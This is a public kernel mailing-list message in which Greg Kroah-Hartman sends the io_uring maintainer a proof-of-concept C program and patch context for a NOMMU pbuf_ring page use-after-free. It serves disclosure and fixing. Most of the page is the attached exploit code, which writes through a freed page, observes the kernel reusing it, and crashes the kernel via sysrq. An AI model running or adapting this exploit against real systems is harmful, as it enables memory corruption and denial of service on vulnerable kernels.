From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200 [thread overview]
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh> (raw)
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>
[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]
On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> >
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
>
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days? I should dig into that,
> maybe that way I can test this and get a reproducer for you. If not,
> let's just bin the thing.
>
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > >
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead? Or is this feature something that !MMU devices
> > > actually care about?
> >
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> >
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
>
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...
Ok, attached is a poc.c and a script to run it. If you run this on a
7.0 kernel today, it "should" crash. and then if you apply the patch it
doesn't (or at least that's what happened in my testing.)
Note, I have run this locally, and it seems to work, but be careful, I
can't guarantee anything, it does seem quite odd in that it "crashes"
the kernel with a sysrq call to show "proof". Although that is a cool
trick, I need to remember that...
thanks,
greg k-h
[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]
// SPDX-License-Identifier: GPL-2.0
/*
* PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
* Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
* cause but hits a mm/nommu.c BUG_ON that the fix does not address;
* this PoC targets 02884.
*
* Fixed by commit b4190296e84b ("io_uring: take page references for
* NOMMU pbuf_ring mmaps").
*
* Mechanism
* ---------
* Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
* virtual address of the io_mapped_region's backing pages directly and
* io_uring_mmap() takes no page references. IORING_UNREGISTER_PBUF_RING
* -> io_put_bl()
* -> io_free_region()
* -> release_pages()
* therefore drops the only reference and the page returns to the buddy
* allocator while the user's VMA still has vm_start pointing into it.
* The user can read/write whatever the allocator hands out next.
*
* Detection: write a canary to the mmap'd page, unregister, re-read.
* Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
* kernel the canary becomes 0x00. On a fixed kernel io_uring_mmap()
* holds a get_page reference, release_pages() leaves refcount >= 1,
* the page is not freed, and the canary survives.
*
* On detection, demonstrate the write-after-free (re-allocate the page
* inside the kernel and observe it via the dangling pointer), then
* sysrq-crash so the qemu console shows an unambiguous kernel panic.
*
* Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
* make -C linux ARCH=riscv O=$PWD/build-nommu headers
* clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
* -mno-relax -static-pie -nostdlib -fno-stack-protector \
* -fno-builtin -isystem build-nommu/usr/include \
* -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
* -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
*
* -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
* not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
* (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
*
* Run as init under qemu-system-riscv64 -M virt -bios none.
* Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
* boot with init_on_free=1.
*/
/*
* binfmt_elf_fdpic's initial stack layout is not the SysV layout that
* nolibc's crt.h _start_c() expects; the auxv walk runs off into
* garbage. We don't need argc/argv/envp, so suppress crt.h and supply
* a minimal _start_c that just calls main. arch-riscv.h still provides
* the asm _start that calls _start_c.
*/
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"
int main(void);
void _start_c(long *sp)
{
(void)sp;
exit(main());
}
#define __NR_io_uring_setup 425
#define __NR_io_uring_register 427
#define IORING_REGISTER_PBUF_RING 22
#define IORING_UNREGISTER_PBUF_RING 23
#define IORING_OFF_PBUF_RING 0x80000000ULL
#define IORING_OFF_PBUF_SHIFT 16
#define IOU_PBUF_RING_MMAP 1
#define PAGE_SIZE 4096
#define CANARY 0x55
struct io_sqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
uint32_t resv1;
uint64_t user_addr;
};
struct io_cqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
uint32_t resv1;
uint64_t user_addr;
};
struct io_uring_params {
uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
uint32_t features, wq_fd, resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};
struct io_uring_buf_reg {
uint64_t ring_addr;
uint32_t ring_entries;
uint16_t bgid;
uint16_t flags;
uint64_t resv[3];
};
static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return my_syscall2(__NR_io_uring_setup, entries, p);
}
static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}
static void die(const char *what, long ret)
{
printf("[-] %s: %ld\n", what, ret);
if (getpid() == 1) {
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
exit(1);
}
static void crash_kernel(void)
{
int fd = open("/proc/sysrq-trigger", O_WRONLY);
if (fd >= 0)
write(fd, "c", 1);
/* sysrq disabled or /proc missing — clean exit so qemu log is
* still parseable. */
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
int main(void)
{
struct io_uring_params p;
struct io_uring_buf_reg reg;
volatile unsigned char *ring;
int fd, ret, i, dirty;
if (getpid() == 1) {
mkdir("/proc", 0555);
mount("proc", "/proc", "proc", 0, NULL);
}
memset(&p, 0, sizeof(p));
fd = io_uring_setup(8, &p);
if (fd < 0)
die("io_uring_setup", fd);
memset(®, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 0;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, ®, 1);
if (ret < 0)
die("REGISTER_PBUF_RING", ret);
ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
if (ring == MAP_FAILED)
die("mmap PBUF_RING", (long)ring);
printf("[*] pbuf_ring page mmap()ed at %p\n", ring);
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = CANARY;
memset(®, 0, sizeof(reg));
reg.bgid = 0;
ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, ®, 1);
if (ret < 0)
die("UNREGISTER_PBUF_RING", ret);
printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
ring[0], ring[1], ring[2], ring[3]);
dirty = 0;
for (i = 0; i < PAGE_SIZE; i++)
if (ring[i] != CANARY)
dirty++;
if (!dirty) {
printf("[+] OK: canary intact — mmap holds page reference, "
"fix is applied\n");
munmap((void *)ring, PAGE_SIZE);
close(fd);
if (getpid() == 1)
reboot(LINUX_REBOOT_CMD_POWER_OFF);
return 0;
}
printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
"(ring[0]=%02x, expected %02x) — page was freed under live mmap\n",
dirty, PAGE_SIZE, ring[0], CANARY);
/*
* Demonstrate write-after-free: scribble through the dangling
* mapping, then make the kernel allocate a fresh page. The pcp
* freelist is LIFO, so the just-freed page is handed straight
* back; we can observe the kernel's writes through our pointer.
*/
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = 0x41;
memset(®, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 1;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, ®, 1);
printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
"ring[0..3] now %02x %02x %02x %02x — kernel reused the page\n",
ret, ring[0], ring[1], ring[2], ring[3]);
printf("[!] triggering sysrq crash\n");
if (getpid() == 1)
crash_kernel();
return 1;
}
[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]
next prev parent reply other threads:[~2026-04-21 16:01 UTC|newest]
Thread overview: 13+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55 ` Greg Kroah-Hartman
2026-04-21 14:02 ` Jens Axboe
2026-04-21 16:01 ` Greg Kroah-Hartman [this message]
2026-04-21 16:05 ` Jens Axboe
2026-04-21 16:21 ` Jens Axboe
2026-04-21 16:24 ` Greg Kroah-Hartman
2026-04-21 16:41 ` Jens Axboe
2026-04-21 17:04 ` Jens Axboe
2026-04-21 17:38 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22 1:17 ` Jens Axboe
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=2026042140-arrogance-freehand-d8bd@gregkh \
--to=gregkh@linuxfoundation.org \
--cc=axboe@kernel.dk \
--cc=io-uring@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox